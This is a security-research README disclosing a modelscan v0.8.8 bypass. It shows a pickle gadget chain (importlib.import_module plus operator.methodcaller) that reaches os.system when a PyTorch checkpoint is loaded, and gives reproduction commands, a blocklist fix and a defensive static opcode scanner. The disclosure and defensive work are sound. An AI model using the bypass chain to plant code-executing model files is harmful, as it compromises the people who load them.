# Modelscan Bypass PoC: importlib + operator.methodcaller
Security research artifact. Do NOT load in production.

This model file bypasses modelscan v0.8.8 and executes arbitrary code when loaded via `torch.load()`.
## Bypass technique

modelscan's `unsafe_globals` blocklist covers `os.*`, `subprocess.*`, `builtins.eval/exec/__import__`, `operator.attrgetter`, etc. However, it does NOT block:

- `importlib.import_module`: can import any module, including `os`
- `operator.methodcaller`: can call any method on an object (only `attrgetter` is blocked)

The pickle chains these two:

```python
operator.methodcaller('system', 'cmd')(importlib.import_module('os'))
# = os.system('cmd')
# = RCE
```
## Reproduction

```shell
# Verify modelscan does NOT detect it
pip install modelscan
modelscan scan pytorch_model-00001-of-00001.bin
# Output: No issues found

# Verify RCE
python3 -c "import torch; torch.load('pytorch_model-00001-of-00001.bin', weights_only=False)"
cat /tmp/mfv_modelscan_bypass_poc
```
## Fix

Add `importlib` and `operator.methodcaller` to modelscan's `unsafe_globals`:

```python
"CRITICAL": {
    "importlib": "*",                            # <- ADD
    "operator": ["attrgetter", "methodcaller"],  # <- ADD methodcaller
    ...
}
```
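To show what the extended blocklist has to catch, here is a small static checker, added as an example and not modelscan's own code. It walks a pickle's opcode stream with `pickletools.genops` (the bytes are never unpickled), resolves every `GLOBAL` / `STACK_GLOBAL` reference to a `(module, name)` pair, and matches it against a blocklist in the shape of the `CRITICAL` block above. `find_globals`, `flag_unsafe` and `UNSAFE_GLOBALS` are names chosen for this example; the sample pickles are constructed inline by pickling `importlib.import_module` and the `operator` classes by reference, which emits only the global-lookup opcodes and calls nothing on load.

```python
"""Static pickle scanner: flags the importlib / operator.methodcaller
references the fix above adds to modelscan's blocklist.

Added example, not modelscan's own code. The bytes are never unpickled;
pickletools.genops only parses the opcode stream.
"""
import importlib
import operator
import pickle
import pickletools

# Assumption: a minimal blocklist in the shape of the "CRITICAL" block in the
# Fix section. "*" covers every attribute of the module.
UNSAFE_GLOBALS = {
    "os": "*",
    "subprocess": "*",
    "builtins": ["eval", "exec", "__import__"],
    "importlib": "*",                            # added by the fix
    "operator": ["attrgetter", "methodcaller"],  # methodcaller added by the fix
}

# Opcodes that push a text constant; STACK_GLOBAL takes its operands from these.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}


def find_globals(data):
    """Return every (module, name) the pickle resolves via GLOBAL or STACK_GLOBAL.

    GLOBAL carries both names inline. STACK_GLOBAL pops them from the stack,
    so the scanner records text constants as they are pushed and follows the
    memo (MEMOIZE/PUT, then GET) so a module string reused by reference is
    still seen. Only string pushes are modelled; that is all STACK_GLOBAL needs.
    """
    found = []
    strings = []           # text constants in push order
    memo = {}              # memo slot -> string, or None for non-string objects
    memo_count = 0         # MEMOIZE assigns slots sequentially
    top_is_string = False  # whether the most recent push was a text constant
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name == "GLOBAL":
            module, attr = arg.split(" ", 1)  # pickletools joins the pair with a space
            found.append((module, attr))
            top_is_string = False
        elif name == "STACK_GLOBAL":
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
            top_is_string = False
        elif name in STRING_OPS:
            strings.append(arg)
            top_is_string = True
        elif name == "MEMOIZE":
            memo[memo_count] = strings[-1] if top_is_string else None
            memo_count += 1
        elif name in PUT_OPS:
            memo[arg] = strings[-1] if top_is_string else None
        elif name in GET_OPS:
            value = memo.get(arg)
            if value is not None:
                strings.append(value)
            top_is_string = value is not None
        elif name not in ("PROTO", "FRAME"):
            top_is_string = False  # anything else is not a text push
    return found


def flag_unsafe(data):
    """Return the referenced globals that match UNSAFE_GLOBALS, in pickle order."""
    hits = []
    for module, attr in find_globals(data):
        # A rule for a top-level package also covers its submodules (importlib.util, os.path).
        rule = UNSAFE_GLOBALS.get(module) or UNSAFE_GLOBALS.get(module.split(".", 1)[0])
        if rule == "*" or (rule and attr in rule):
            hits.append((module, attr))
    return hits


# Constructed samples. Pickling a function or class *by reference* emits only
# the GLOBAL (protocol 2) / STACK_GLOBAL (protocol 4) opcode for it; nothing is
# called when such a pickle is loaded, which is enough to exercise the resolver.
SAMPLE_IMPORTLIB_P4 = pickle.dumps(importlib.import_module, protocol=4)
SAMPLE_IMPORTLIB_P2 = pickle.dumps(importlib.import_module, protocol=2)
SAMPLE_OPERATOR = pickle.dumps((operator.methodcaller, operator.attrgetter), protocol=4)
SAMPLE_BENIGN = pickle.dumps({"weights": [0.1, 0.2], "layers": 2}, protocol=4)

if __name__ == "__main__":
    for label, blob in [("importlib p4", SAMPLE_IMPORTLIB_P4),
                        ("importlib p2", SAMPLE_IMPORTLIB_P2),
                        ("operator", SAMPLE_OPERATOR),
                        ("benign", SAMPLE_BENIGN)]:
        print(f"{label:13} globals={find_globals(blob)} flagged={flag_unsafe(blob)}")
```

Run it as a script to see each sample's resolved globals and which ones the blocklist flags; the benign state-dict-shaped sample resolves no globals at all. The check is static and complements, rather than replaces, loading checkpoints with `torch.load(..., weights_only=True)`, which the reproduction step above has to switch off with `weights_only=False`.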